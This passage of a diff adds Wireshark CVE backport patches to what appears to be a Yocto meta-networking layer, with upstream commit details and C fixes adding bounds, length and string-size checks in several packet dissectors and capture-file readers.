value of zero can cause +infinite loops if this isn't done. + + +(cherry picked from commit 13823bb1059cf70f401892ba1b1eaa2400cdf3db) + +Upstream-Status: Backport [https://gitlab.com/wireshark/wireshark/-/commit/39db474f80af87449ce0f034522dccc80ed4153f] +CVE: CVE-2022-4345 +Signed-off-by: Vivek Kumbhar <vkumbhar@mvista.com> +--- + epan/dissectors/packet-openflow_v6.c | 8 +++++++- + 1 file changed, 7 insertions(+), 1 deletion(-) + +diff --git a/epan/dissectors/packet-openflow_v6.c b/epan/dissectors/packet-openflow_v6.c +index 16016af..3e24d76 100644 +--- a/epan/dissectors/packet-openflow_v6.c ++++ b/epan/dissectors/packet-openflow_v6.c +@@ -1118,17 +1118,23 @@ dissect_openflow_v6_oxs(tvbuff_t *tvb, packet_info *pinfo _U_, proto_tree *tree, + static int + dissect_openflow_stats_v6(tvbuff_t *tvb, packet_info *pinfo _U_, proto_tree *tree, int offset, guint16 length _U_) + { ++ proto_item *ti; + guint32 stats_length; + int oxs_end; + guint32 padding; + + proto_tree_add_item(tree, hf_openflow_v6_stats_reserved, tvb, offset, 2, ENC_NA); + +- proto_tree_add_item_ret_uint(tree, hf_openflow_v6_stats_length, tvb, offset+2, 2, ENC_BIG_ENDIAN, &stats_length); ++ ti = proto_tree_add_item_ret_uint(tree, hf_openflow_v6_stats_length, tvb, offset+2, 2, ENC_BIG_ENDIAN, &stats_length); + + oxs_end = offset + stats_length; + offset+=4; + ++ if (stats_length < 4) { ++ expert_add_info(pinfo, ti, &ei_openflow_v6_length_too_short); ++ return offset; ++ } ++ + while (offset < oxs_end) { + offset = dissect_openflow_v6_oxs(tvb, pinfo, tree, offset, oxs_end - offset); + } +-- +2.40.1 + diff --git a/meta-networking/recipes-support/wireshark/files/CVE-2023-0666.patch b/meta-networking/recipes-support/wireshark/files/CVE-2023-0666.patch new file mode 100644 index 0000000000..7732916826 --- /dev/null +++ b/meta-networking/recipes-support/wireshark/files/CVE-2023-0666.patch @@ -0,0 +1,122 @@ +From 265cbf15a418b629c3c8f02c0ba901913b1c8fd2 Mon Sep 17 00:00:00 2001 +From: Gerald Combs <gerald@wireshark.org> +Date: Thu, 18 May 2023 13:52:48 -0700 +Subject: [PATCH] RTPS: Fixup our g_strlcpy dest_sizes + +Use the proper dest_size in various g_strlcpy calls. + +Fixes #19085 + +(cherry picked from commit 28fdce547c417b868c521f87fb58f71ca6b1e3f7) + +Upstream-Status: Backport [https://gitlab.com/wireshark/wireshark/-/commit/265cbf15a418b629c3c8f02c0ba901913b1c8fd2] +CVE: CVE-2023-0666 +Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com> +--- + epan/dissectors/packet-rtps.c | 22 +++++++++++----------- + 1 file changed, 11 insertions(+), 11 deletions(-) + +diff --git a/epan/dissectors/packet-rtps.c b/epan/dissectors/packet-rtps.c +index 5c2d1c1..ef592d7 100644 +--- a/epan/dissectors/packet-rtps.c ++++ b/epan/dissectors/packet-rtps.c +@@ -3025,7 +3025,7 @@ static gint rtps_util_add_typecode(proto_tree *tree, tvbuff_t *tvb, gint offset, + ++tk_id; + } + +- g_strlcpy(type_name, rtps_util_typecode_id_to_string(tk_id), 40); ++ g_strlcpy(type_name, rtps_util_typecode_id_to_string(tk_id), sizeof(type_name)); + + /* Structure of the typecode data: + * +@@ -3196,7 +3196,7 @@ static gint rtps_util_add_typecode(proto_tree *tree, tvbuff_t *tvb, gint offset, + member_name, -1, NULL, ndds_40_hack); + } + /* Finally prints the name of the struct (if provided) */ +- g_strlcpy(type_name, "}", 40); ++ g_strlcpy(type_name, "}", sizeof(type_name)); + break; + + } /* end of case UNION */ +@@ -3367,7 +3367,7 @@ static gint rtps_util_add_typecode(proto_tree *tree, tvbuff_t *tvb, gint offset, + } + } + /* Finally prints the name of the struct (if provided) */ +- g_strlcpy(type_name, "}", 40); ++ g_strlcpy(type_name, "}", sizeof(type_name)); + break; + } + +@@ -3459,7 +3459,7 @@ static gint rtps_util_add_typecode(proto_tree *tree, tvbuff_t *tvb, gint offset, + offset += 4; + alias_name = tvb_get_string_enc(wmem_packet_scope(), tvb, offset, alias_name_length, ENC_ASCII); + offset += alias_name_length; +- g_strlcpy(type_name, alias_name, 40); ++ g_strlcpy(type_name, alias_name, sizeof(type_name)); + break; + } + +@@ -3494,7 +3494,7 @@ static gint rtps_util_add_typecode(proto_tree *tree, tvbuff_t *tvb, gint offset, + if (tk_id == RTI_CDR_TK_VALUE_PARAM) { + type_id_name = "valueparam"; + } +- g_snprintf(type_name, 40, "%s '%s'", type_id_name, value_name); ++ g_snprintf(type_name, sizeof(type_name), "%s '%s'", type_id_name, value_name); + break; + } + } /* switch(tk_id) */ +@@ -3673,7 +3673,7 @@ static gint rtps_util_add_type_library_type(proto_tree *tree, + long_number = tvb_get_guint32(tvb, offset_tmp, encoding); + name = tvb_get_string_enc(wmem_packet_scope(), tvb, offset_tmp+4, long_number, ENC_ASCII); + if (info) +- g_strlcpy(info->member_name, name, long_number); ++ g_strlcpy(info->member_name, name, sizeof(info->member_name)); + + proto_item_append_text(tree, " %s", name); + offset += member_length; +@@ -3848,13 +3848,13 @@ static gint rtps_util_add_type_member(proto_tree *tree, + proto_item_append_text(tree, " %s (ID: %d)", name, member_id); + if (member_object) { + member_object->member_id = member_id; +- g_strlcpy(member_object->member_name, name, long_number < 256 ? long_number : 256); ++ g_strlcpy(member_object->member_name, name, sizeof(member_object->member_name)); + member_object->type_id = member_type_id; + } + if (info && info->extensibility == EXTENSIBILITY_MUTABLE) { + mutable_member_mapping * mutable_mapping = NULL; + mutable_mapping = wmem_new(wmem_file_scope(), mutable_member_mapping); +- g_strlcpy(mutable_mapping->member_name, name, long_number < 256 ? long_number : 256); ++ g_strlcpy(mutable_mapping->member_name, name, sizeof(mutable_mapping->member_name)); + mutable_mapping->struct_type_id = info->type_id; + mutable_mapping->member_type_id = member_type_id; + mutable_mapping->member_id = member_id; +@@ -3909,7 +3909,7 @@ static gint rtps_util_add_type_union_member(proto_tree *tree, + union_member_mapping * mapping = NULL; + + mapping = wmem_new(wmem_file_scope(), union_member_mapping); +- g_strlcpy(mapping->member_name, object.member_name, 256); ++ g_strlcpy(mapping->member_name, object.member_name, sizeof(mapping->member_name)); + mapping->member_type_id = object.type_id; + mapping->discriminator = HASHMAP_DISCRIMINATOR_CONSTANT; + mapping->union_type_id = union_type_id + mapping->discriminator; +@@ -3922,7 +3922,7 @@ static gint rtps_util_add_type_union_member(proto_tree *tree, + union_member_mapping * mapping = NULL; + + mapping = wmem_new(wmem_file_scope(), union_member_mapping); +- g_strlcpy(mapping->member_name, object.member_name, 256); ++ g_strlcpy(mapping->member_name, object.member_name, sizeof(mapping->member_name)); + mapping->member_type_id = object.type_id; + mapping->discriminator = -1; + mapping->union_type_id = union_type_id + mapping->discriminator; +@@ -3942,7 +3942,7 @@ static gint rtps_util_add_type_union_member(proto_tree *tree, + ti = proto_tree_add_item(labels, hf_rtps_type_object_union_label, tvb, offset_tmp, 4, encoding); + offset_tmp += 4; + +- g_strlcpy(mapping->member_name, object.member_name, 256); ++ g_strlcpy(mapping->member_name, object.member_name, sizeof(mapping->member_name)); + mapping->member_type_id = object.type_id; + mapping->discriminator = discriminator_case; + mapping->union_type_id = union_type_id + discriminator_case; +-- +2.25.1 + diff --git a/meta-networking/recipes-support/wireshark/files/CVE-2023-0667.patch b/meta-networking/recipes-support/wireshark/files/CVE-2023-0667.patch new file mode 100644 index 0000000000..cd07395aac --- /dev/null +++ b/meta-networking/recipes-support/wireshark/files/CVE-2023-0667.patch @@ -0,0 +1,66 @@ +From 85fbca8adb09ea8e1af635db3d92727fbfa1e28a Mon Sep 17 00:00:00 2001 +From: John Thacker <johnthacker@gmail.com> +Date: Thu, 18 May 2023 18:06:36 -0400 +Subject: [PATCH] MS-MMS: Use format_text_string() + +The length of a string transcoded from UTF-16 to UTF-8 can be +shorter (or longer) than the original length in bytes in the packet. +Use the new string length, not the original length. + +Use format_text_string, which is a convenience function that +calls strlen. + +Fix #19086 + +(cherry picked from commit 1c45a899f83fa88e60ab69936bea3c4754e7808b) + +Upstream-Status: Backport [https://gitlab.com/wireshark/wireshark/-/commit/85fbca8adb09ea8e1af635db3d92727fbfa1e28a] +CVE: CVE-2023-0667 +Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com> +--- + epan/dissectors/packet-ms-mms.c | 8 ++++---- + 1 file changed, 4 insertions(+), 4 deletions(-) + +diff --git a/epan/dissectors/packet-ms-mms.c b/epan/dissectors/packet-ms-mms.c +index f4dbcd0..092a64b 100644 +--- a/epan/dissectors/packet-ms-mms.c ++++ b/epan/dissectors/packet-ms-mms.c +@@ -740,7 +740,7 @@ static void dissect_client_transport_info(tvbuff_t *tvb, packet_info *pinfo, pro + transport_info, "Transport: (%s)", transport_info); + + col_append_fstr(pinfo->cinfo, COL_INFO, " (%s)", +- format_text(wmem_packet_scope(), (guchar*)transport_info, length_remaining - 20)); ++ format_text_string(pinfo->pool, (const guchar*)transport_info)); + + + /* Try to extract details from this string */ +@@ -837,7 +837,7 @@ static void dissect_server_info(tvbuff_t *tvb, packet_info *pinfo, proto_tree *t + ENC_UTF_16|ENC_LITTLE_ENDIAN, wmem_packet_scope(), &server_version); + + col_append_fstr(pinfo->cinfo, COL_INFO, " (version='%s')", +- format_text(wmem_packet_scope(), (const guchar*)server_version, strlen(server_version))); ++ format_text_string(pinfo->pool, (const guchar*)server_version)); + } + offset += (server_version_length*2); + +@@ -891,7 +891,7 @@ static void dissect_client_player_info(tvbuff_t *tvb, packet_info *pinfo, proto_ + ENC_UTF_16|ENC_LITTLE_ENDIAN, wmem_packet_scope(), &player_info); + + col_append_fstr(pinfo->cinfo, COL_INFO, " (%s)", +- format_text(wmem_packet_scope(), (const guchar*)player_info, strlen(player_info))); ++ format_text_string(pinfo->pool, (const guchar*)player_info)); + } + + /* Dissect info about where client wants to start playing from */ +@@ -966,7 +966,7 @@ static void dissect_request_server_file(tvbuff_t *tvb, packet_info *pinfo, proto + ENC_UTF_16|ENC_LITTLE_ENDIAN, wmem_packet_scope(), &server_file); + + col_append_fstr(pinfo->cinfo, COL_INFO, " (%s)", +- format_text(wmem_packet_scope(), (const guchar*)server_file, strlen(server_file))); ++ format_text_string(pinfo->pool, (const guchar*)server_file)); + } + + /* Dissect media details from server */ +-- +2.25.1 + diff --git a/meta-networking/recipes-support/wireshark/files/CVE-2023-0668.patch b/meta-networking/recipes-support/wireshark/files/CVE-2023-0668.patch new file mode 100644 index 0000000000..0009939330 --- /dev/null +++ b/meta-networking/recipes-support/wireshark/files/CVE-2023-0668.patch @@ -0,0 +1,33 @@ +From c4f37d77b29ec6a9754795d0efb6f68d633728d9 Mon Sep 17 00:00:00 2001 +From: John Thacker <johnthacker@gmail.com> +Date: Sat, 20 May 2023 23:08:08 -0400 +Subject: [PATCH] synphasor: Use val_to_str_const + +Don't use a value from packet data to directly index a value_string, +particularly when the value string doesn't cover all possible values. + +Fix #19087 + +Upstream-Status: Backport [https://gitlab.com/wireshark/wireshark/-/commit/c4f37d77b29ec6a9754795d0efb6f68d633728d9] +CVE: CVE-2023-0668 +Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com> +--- + epan/dissectors/packet-synphasor.c | 2 +- + 1 file changed, 1 insertion(+), 1 deletion(-) + +diff --git a/epan/dissectors/packet-synphasor.c b/epan/dissectors/packet-synphasor.c +index 12b388b..fbde875 100644 +--- a/epan/dissectors/packet-synphasor.c ++++ b/epan/dissectors/packet-synphasor.c +@@ -1212,7 +1212,7 @@ static gint dissect_PHSCALE(tvbuff_t *tvb, proto_tree *tree, gint offset, gint c + + data_flag_tree = proto_tree_add_subtree_format(single_phasor_scaling_and_flags_tree, tvb, offset, 4, + ett_conf_phflags, NULL, "Phasor Data flags: %s", +- conf_phasor_type[tvb_get_guint8(tvb, offset + 2)].strptr); ++ val_to_str_const(tvb_get_guint8(tvb, offset + 2), conf_phasor_type, "Unknown")); + + /* first and second bytes - phasor modification flags*/ + phasor_flag1_tree = proto_tree_add_subtree_format(data_flag_tree, tvb, offset, 2, ett_conf_phmod_flags, +-- +2.25.1 + diff --git a/meta-networking/recipes-support/wireshark/files/CVE-2023-1992.patch b/meta-networking/recipes-support/wireshark/files/CVE-2023-1992.patch new file mode 100644 index 0000000000..6bddf975d0 --- /dev/null +++ b/meta-networking/recipes-support/wireshark/files/CVE-2023-1992.patch @@ -0,0 +1,61 @@ +From 3c8be14c827f1587da3c2b3bb0d9c04faff57413 Mon Sep 17 00:00:00 2001 +From: John Thacker <johnthacker@gmail.com> +Date: Sun, 19 Mar 2023 15:16:39 -0400 +Subject: [PATCH] RPCoRDMA: Frame end cleanup for global write offsets + +Add a frame end routine for a global which is assigned to packet +scoped memory. It really should be made proto data, but is used +in a function in the header (that doesn't take the packet info +struct as an argument) and this fix needs to be made in stable +branches. + +Fix #18852 + +Upstream-Status: Backport [https://gitlab.com/colin.mcinnes/wireshark/-/commit/3c8be14c827f1587da3c2b3bb0d9c04faff5741] +CVE: CVE-2023-1992 +Signed-off-by: Vivek Kumbhar <vkumbhar@mvista.com> +--- + epan/dissectors/packet-rpcrdma.c | 14 ++++++++++++++ + 1 file changed, 14 insertions(+) + +diff --git a/epan/dissectors/packet-rpcrdma.c b/epan/dissectors/packet-rpcrdma.c +index 76085c7..9d57bae 100644 +--- a/epan/dissectors/packet-rpcrdma.c ++++ b/epan/dissectors/packet-rpcrdma.c +@@ -24,6 +24,7 @@ + #include <epan/addr_resolv.h> + + #include "packet-rpcrdma.h" ++#include "packet-frame.h" + #include "packet-infiniband.h" + #include "packet-iwarp-ddp-rdmap.h" + +@@ -270,6 +271,18 @@ void rpcrdma_insert_offset(gint offset) + wmem_array_append_one(gp_rdma_write_offsets, offset); + } + ++/* ++ * Reset the array of write offsets at the end of the frame. These ++ * are packet scoped, so they don't need to be freed, but we want ++ * to ensure that the global doesn't point to no longer allocated ++ * memory in a later packet. ++ */ ++static void ++reset_write_offsets(void) ++{ ++ gp_rdma_write_offsets = NULL; ++} ++ + /* Get conversation state, it is created if it does not exist */ + static rdma_conv_info_t *get_rdma_conv_info(packet_info *pinfo) + { +@@ -1392,6 +1405,7 @@ dissect_rpcrdma(tvbuff_t *tvb, packet_info *pinfo, proto_tree *tree, void* data + if (write_size > 0 && !pinfo->fd->visited) { + /* Initialize array of write chunk offsets */ + gp_rdma_write_offsets = wmem_array_new(wmem_packet_scope(), sizeof(gint)); ++ register_frame_end_routine(pinfo, reset_write_offsets); + TRY { + /* + * Call the upper layer dissector to get a list of offsets +-- +2.40.1 diff --git a/meta-networking/recipes-support/wireshark/files/CVE-2023-2855.patch b/meta-networking/recipes-support/wireshark/files/CVE-2023-2855.patch new file mode 100644 index 0000000000..b4718f4607 --- /dev/null +++ b/meta-networking/recipes-support/wireshark/files/CVE-2023-2855.patch @@ -0,0 +1,108 @@ +From 0181fafb2134a177328443a60b5e29c4ee1041cb Mon Sep 17 00:00:00 2001 +From: Guy Harris <gharris@sonic.net> +Date: Tue, 16 May 2023 12:05:07 -0700 +Subject: [PATCH] candump: check for a too-long frame length. + +If the frame length is longer than the maximum, report an error in the +file. + +Fixes #19062, preventing the overflow on a buffer on the stack (assuming +your compiler doesn't call a bounds-checknig version of memcpy() if the +size of the target space is known). + +Upstream-Status: Backport [https://gitlab.com/wireshark/wireshark/-/commit/0181fafb2134a177328443a60b5e29c4ee1041cb] +CVE: CVE-2023-2855 + +Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com> +--- + wiretap/candump.c | 39 +++++++++++++++++++++++++++++++-------- + 1 file changed, 31 insertions(+), 8 deletions(-) + +diff --git a/wiretap/candump.c b/wiretap/candump.c +index 0def7bc..3f7c2b2 100644 +--- a/wiretap/candump.c ++++ b/wiretap/candump.c +@@ -26,8 +26,9 @@ static gboolean candump_seek_read(wtap *wth, gint64 seek_off, + wtap_rec *rec, Buffer *buf, + int *err, gchar **err_info); + +-static void +-candump_write_packet(wtap_rec *rec, Buffer *buf, const msg_t *msg) ++static gboolean ++candump_write_packet(wtap_rec *rec, Buffer *buf, const msg_t *msg, int *err, ++ gchar **err_info) + { + static const char *can_proto_name = "can-hostendian"; + static const char *canfd_proto_name = "canfd"; +@@ -59,6 +60,18 @@ candump_write_packet(wtap_rec *rec, Buffer *buf, const msg_t *msg) + { + canfd_frame_t canfd_frame = {0}; + ++ /* ++ * There's a maximum of CANFD_MAX_DLEN bytes in a CAN-FD frame. ++ */ ++ if (msg->data.length > CANFD_MAX_DLEN) { ++ *err = WTAP_ERR_BAD_FILE; ++ if (err_info != NULL) { ++ *err_info = g_strdup_printf("candump: File has %u-byte CAN FD packet, bigger than maximum of %u", ++ msg->data.length, CANFD_MAX_DLEN); ++ } ++ return FALSE; ++ } ++ + canfd_frame.can_id = msg->id; + canfd_frame.flags = msg->flags; + canfd_frame.len = msg->data.length; +@@ -70,6 +83,18 @@ candump_write_packet(wtap_rec *rec, Buffer *buf, const msg_t *msg) + { + can_frame_t can_frame = {0}; + ++ /* ++ * There's a maximum of CAN_MAX_DLEN bytes in a CAN frame. ++ */ ++ if (msg->data.length > CAN_MAX_DLEN) { ++ *err = WTAP_ERR_BAD_FILE; ++ if (err_info != NULL) { ++ *err_info = g_strdup_printf("candump: File has %u-byte CAN packet, bigger than maximum of %u", ++ msg->data.length, CAN_MAX_DLEN); ++ } ++ return FALSE; ++ } ++ + can_frame.can_id = msg->id; + can_frame.can_dlc = msg->data.length; + memcpy(can_frame.data, msg->data.data, msg->data.length); +@@ -84,6 +109,8 @@ candump_write_packet(wtap_rec *rec, Buffer *buf, const msg_t *msg) + + rec->rec_header.packet_header.caplen = packet_length; + rec->rec_header.packet_header.len = packet_length; ++ ++ return TRUE; + } + + static gboolean +@@ -190,9 +217,7 @@ candump_read(wtap *wth, wtap_rec *rec, Buffer *buf, int *err, gchar **err_info, + ws_debug_printf("%s: Stopped at offset %" PRIi64 "\n", G_STRFUNC, file_tell(wth->fh)); + #endif + +- candump_write_packet(rec, buf, &msg); +- +- return TRUE; ++ return candump_write_packet(rec, buf, &msg, err, err_info); + } + + static gboolean +@@ -216,9 +241,7 @@ candump_seek_read(wtap *wth , gint64 seek_off, wtap_rec *rec, + if (!candump_parse(wth->random_fh, &msg, NULL, err, err_info)) + return FALSE; + +- candump_write_packet(rec, buf, &msg); +- +- return TRUE; ++ return candump_write_packet(rec, buf, &msg, err, err_info); + } + + /* +-- +2.25.1 + diff --git a/meta-networking/recipes-support/wireshark/files/CVE-2023-2856.patch b/meta-networking/recipes-support/wireshark/files/CVE-2023-2856.patch new file mode 100644 index 0000000000..863421f986 --- /dev/null +++ b/meta-networking/recipes-support/wireshark/files/CVE-2023-2856.patch @@ -0,0 +1,69 @@ +From db5135826de3a5fdb3618225c2ff02f4207012ca Mon Sep 17 00:00:00 2001 +From: Guy Harris <gharris@sonic.net> +Date: Thu, 18 May 2023 15:03:23 -0700 +Subject: [PATCH] vms: fix the search for the packet length field. + +The packet length field is of the form + + Total Length = DDD = ^xXXX + +where "DDD" is the length in decimal and "XXX" is the length in +hexadecimal. + +Search for "length ". not just "Length", as we skip past "Length ", not +just "Length", so if we assume we found "Length " but only found +"Length", we'd skip past the end of the string. + +While we're at it, fail if we don't find a length field, rather than +just blithely acting as if the packet length were zero. + +Fixes #19083. + +Upstream-Status: Backport [https://gitlab.com/wireshark/wireshark/-/commit/db5135826de3a5fdb3618225c2ff02f4207012ca] +CVE: CVE-2023-2856 + +Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com> +--- + wiretap/vms.c | 9 ++++++++- + 1 file changed, 8 insertions(+), 1 deletion(-) + +diff --git a/wiretap/vms.c b/wiretap/vms.c +index 0aa83ea..5f5fdbb 100644 +--- a/wiretap/vms.c ++++ b/wiretap/vms.c +@@ -318,6 +318,7 @@ parse_vms_packet(FILE_T fh, wtap_rec *rec, Buffer *buf, int *err, gchar **err_in + { + char line[VMS_LINE_LENGTH + 1]; + int num_items_scanned; ++ gboolean have_pkt_len = FALSE; + guint32 pkt_len = 0; + int pktnum; + int csec = 101; +@@ -374,7 +375,7 @@ parse_vms_packet(FILE_T fh, wtap_rec *rec, Buffer *buf, int *err, gchar **err_in + return FALSE; + } + } +- if ( (! pkt_len) && (p = strstr(line, "Length"))) { ++ if ( (! have_pkt_len) && (p = strstr(line, "Length "))) { + p += sizeof("Length "); + while (*p && ! g_ascii_isdigit(*p)) + p++; +@@ -390,9 +391,15 @@ parse_vms_packet(FILE_T fh, wtap_rec *rec, Buffer *buf, int *err, gchar **err_in + *err_info = g_strdup_printf("vms: Length field '%s' not valid", p); + return FALSE; + } ++ have_pkt_len = TRUE; + break; + } + } while (! isdumpline(line)); ++ if (! have_pkt_len) { ++ *err = WTAP_ERR_BAD_FILE; ++ *err_info = g_strdup_printf("vms: Length field not found"); ++ return FALSE; ++ } + if (pkt_len > WTAP_MAX_PACKET_SIZE_STANDARD) { + /* + * Probably a corrupt capture file; return an error, +-- +2.25.1 + diff --git a/meta-networking/recipes-support/wireshark/files/CVE-2023-2858.patch b/meta-networking/recipes-support/wireshark/files/CVE-2023-2858.patch new file mode 100644 index 0000000000..7174e9155c --- /dev/null +++ b/meta-networking/recipes-support/wireshark/files/CVE-2023-2858.patch @@ -0,0 +1,95 @@ +From cb190d6839ddcd4596b0205844f45553f1e77105 Mon Sep 17 00:00:00 2001 +From: Guy Harris <gharris@sonic.net> +Date: Fri, 19 May 2023 16:29:45 -0700 +Subject: [PATCH] netscaler: add more checks to make sure the record is within + the page. + +Whie we're at it, restructure some other checks to test-before-casting - +it's OK to test afterwards, but testing before makes it follow the +pattern used elsewhere. + +Fixes #19081. + +Upstream-Status: Backport [https://gitlab.com/wireshark/wireshark/-/commit/cb190d6839ddcd4596b0205844f45553f1e77105] +CVE: CVE-2023-2858 + +Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com> +--- + wiretap/netscaler.c | 15 ++++++++++----- + 1 file changed, 10 insertions(+), 5 deletions(-) + +diff --git a/wiretap/netscaler.c b/wiretap/netscaler.c +index 01a7f6d..4fa020b 100644 +--- a/wiretap/netscaler.c ++++ b/wiretap/netscaler.c +@@ -1091,13 +1091,13 @@ static gboolean nstrace_set_start_time(wtap *wth, int *err, gchar **err_info) + + #define PACKET_DESCRIBE(rec,buf,FULLPART,fullpart,ver,type,HEADERVER) \ + do {\ +- nspr_pktrace##fullpart##_v##ver##_t *type = (nspr_pktrace##fullpart##_v##ver##_t *) &nstrace_buf[nstrace_buf_offset];\ + /* Make sure the record header is entirely contained in the page */\ +- if ((nstrace_buflen - nstrace_buf_offset) < sizeof *type) {\ ++ if ((nstrace_buflen - nstrace_buf_offset) < sizeof(nspr_pktrace##fullpart##_v##ver##_t)) {\ + *err = WTAP_ERR_BAD_FILE;\ + *err_info = g_strdup("nstrace: record header crosses page boundary");\ + return FALSE;\ + }\ ++ nspr_pktrace##fullpart##_v##ver##_t *type = (nspr_pktrace##fullpart##_v##ver##_t *) &nstrace_buf[nstrace_buf_offset];\ + /* Check sanity of record size */\ + if (pletoh16(&type->nsprRecordSize) < sizeof *type) {\ + *err = WTAP_ERR_BAD_FILE;\ +@@ -1162,6 +1162,8 @@ static gboolean nstrace_read_v10(wtap *wth, wtap_rec *rec, Buffer *buf, + + case NSPR_ABSTIME_V10: + { ++ if (!nstrace_ensure_buflen(nstrace, nstrace_buf_offset, sizeof(nspr_pktracefull_v10_t), err, err_info)) ++ return FALSE; + nspr_pktracefull_v10_t *fp = (nspr_pktracefull_v10_t *) &nstrace_buf[nstrace_buf_offset]; + if (pletoh16(&fp->nsprRecordSize) == 0) { + *err = WTAP_ERR_BAD_FILE; +@@ -1175,6 +1177,8 @@ static gboolean nstrace_read_v10(wtap *wth, wtap_rec *rec, Buffer *buf, + + case NSPR_RELTIME_V10: + { ++ if (!nstrace_ensure_buflen(nstrace, nstrace_buf_offset, sizeof(nspr_pktracefull_v10_t), err, err_info)) ++ return FALSE; + nspr_pktracefull_v10_t *fp = (nspr_pktracefull_v10_t *) &nstrace_buf[nstrace_buf_offset]; + if (pletoh16(&fp->nsprRecordSize) == 0) { + *err = WTAP_ERR_BAD_FILE; +@@ -1192,6 +1196,8 @@ static gboolean nstrace_read_v10(wtap *wth, wtap_rec *rec, Buffer *buf, + + default: + { ++ if (!nstrace_ensure_buflen(nstrace, nstrace_buf_offset, sizeof(nspr_pktracefull_v10_t), err, err_info)) ++ return FALSE; + nspr_pktracefull_v10_t *fp = (nspr_pktracefull_v10_t *) &nstrace_buf[nstrace_buf_offset]; + if (pletoh16(&fp->nsprRecordSize) == 0) { + *err = WTAP_ERR_BAD_FILE; +@@ -1475,14 +1481,14 @@ static gboolean nstrace_read_v20(wtap *wth, wtap_rec *rec, Buffer *buf, + + #define PACKET_DESCRIBE(rec,buf,FULLPART,ver,enumprefix,type,structname,HEADERVER)\ + do {\ +- nspr_##structname##_t *fp = (nspr_##structname##_t *) &nstrace_buf[nstrace_buf_offset];\ + /* Make sure the record header is entirely contained in the page */\ +- if ((nstrace->nstrace_buflen - nstrace_buf_offset) < sizeof *fp) {\ ++ if ((nstrace->nstrace_buflen - nstrace_buf_offset) < sizeof(nspr_##structname##_t)) {\ + *err = WTAP_ERR_BAD_FILE;\ + *err_info = g_strdup("nstrace: record header crosses page boundary");\ + g_free(nstrace_tmpbuff);\ + return FALSE;\ + }\ ++ nspr_##structname##_t *fp = (nspr_##structname##_t *) &nstrace_buf[nstrace_buf_offset];\ + (rec)->rec_type = REC_TYPE_PACKET;\ + TIMEDEFV##ver((rec),fp,type);\ + FULLPART##SIZEDEFV##ver((rec),fp,ver);\ +@@ -1589,7 +1595,6 @@ static gboolean nstrace_read_v30(wtap *wth, wtap_rec *rec, Buffer *buf, + g_free(nstrace_tmpbuff); + return FALSE; + } +- + hdp = (nspr_hd_v20_t *) &nstrace_buf[nstrace_buf_offset]; + if (nspr_getv20recordsize(hdp) == 0) { + *err = WTAP_ERR_BAD_FILE; +-- +2.25.1 + diff --git a/meta-networking/recipes-support/wireshark/files/CVE-2023-2879.patch b/meta-networking/recipes-support/wireshark/files/CVE-2023-2879.patch new file mode 100644 index 0000000000..0a8247923e --- /dev/null +++ b/meta-networking/recipes-support/wireshark/files/CVE-2023-2879.patch @@ -0,0 +1,37 @@ +From 118815ca7c9f82c1f83f8f64d9e0e54673f31677 Mon Sep 17 00:00:00 2001 +From: John Thacker <johnthacker@gmail.com> +Date: Sat, 13 May 2023 21:45:16 -0400 +Subject: [PATCH] GDSDB: Make sure our offset advances. + +add_uint_string() returns the next offset to use, not the number +of bytes consumed. So to consume all the bytes and make sure the +offset advances, return the entire reported tvb length, not the +number of bytes remaining. + +Fixup 8d3c2177793e900cfc7cfaac776a2807e4ea289f +Fixes #19068 + +Upstream-Status: Backport [https://gitlab.com/wireshark/wireshark/-/commit/118815ca7c9f82c1f83f8f64d9e0e54673f31677] +CVE: CVE-2023-2879 + +Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com> +--- + epan/dissectors/packet-gdsdb.c | 2 +- + 1 file changed, 1 insertion(+), 1 deletion(-) + +diff --git a/epan/dissectors/packet-gdsdb.c b/epan/dissectors/packet-gdsdb.c +index 75bcfb9..950d68f 100644 +--- a/epan/dissectors/packet-gdsdb.c ++++ b/epan/dissectors/packet-gdsdb.c +@@ -480,7 +480,7 @@ static int add_uint_string(proto_tree *tree, int hf_string, tvbuff_t *tvb, int o + int ret_offset = offset + length; + if (length < 4 || ret_offset < offset) { + expert_add_info_format(NULL, ti, &ei_gdsdb_invalid_length, "Invalid length: %d", length); +- return tvb_reported_length_remaining(tvb, offset); ++ return tvb_reported_length(tvb); + } + return ret_offset; + } +-- +2.25.1 + diff --git a/meta-networking/recipes-support/wireshark/files/CVE-2023-2906.patch b/meta-networking/recipes-support/wireshark/files/CVE-2023-2906.patch new file mode 100644 index 0000000000..fe21097286 --- /dev/null +++ b/meta-networking/recipes-support/wireshark/files/CVE-2023-2906.patch @@ -0,0 +1,38 @@ +From 44dc70cc5aadca91cb8ba3710c59c3651b7b0d4d Mon Sep 17 00:00:00 2001 +From: Jaap Keuter <jaap.keuter@xs4all.nl> +Date: Thu, 27 Jul 2023 20:21:19 +0200 +Subject: [PATCH] CP2179: Handle timetag info response without records + +Fixes #19229 + +Upstream-Status: Backport [https://gitlab.com/wireshark/wireshark/-/commit/44dc70cc5aadca91cb8ba3710c59c3651b7b0d4d] +CVE: CVE-2023-2906 +Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com> +--- + epan/dissectors/packet-cp2179.c | 7 +++++-- + 1 file changed, 5 insertions(+), 2 deletions(-) + +diff --git a/epan/dissectors/packet-cp2179.c b/epan/dissectors/packet-cp2179.c +index 30f53f8..70fe033 100644 +--- a/epan/dissectors/packet-cp2179.c ++++ b/epan/dissectors/packet-cp2179.c +@@ -721,11 +721,14 @@ dissect_response_frame(tvbuff_t *tvb, proto_tree *tree, packet_info *pinfo, int + proto_tree_add_item(cp2179_proto_tree, hf_cp2179_timetag_numsets, tvb, offset, 1, ENC_LITTLE_ENDIAN); + + num_records = tvb_get_guint8(tvb, offset) & 0x7F; ++ offset += 1; ++ ++ if (num_records == 0 || numberofcharacters <= 1) ++ break; ++ + recordsize = (numberofcharacters-1) / num_records; + num_values = (recordsize-6) / 2; /* Determine how many 16-bit analog values are present in each event record */ + +- offset += 1; +- + for (x = 0; x < num_records; x++) + { + cp2179_event_tree = proto_tree_add_subtree_format(cp2179_proto_tree, tvb, offset, recordsize, ett_cp2179_event, NULL, "Event Record # %d", x+1); +-- +2.25.1 + diff --git a/meta-networking/recipes-support/wireshark/files/CVE-2023-2952.patch b/meta-networking/recipes-support/wireshark/files/CVE-2023-2952.patch 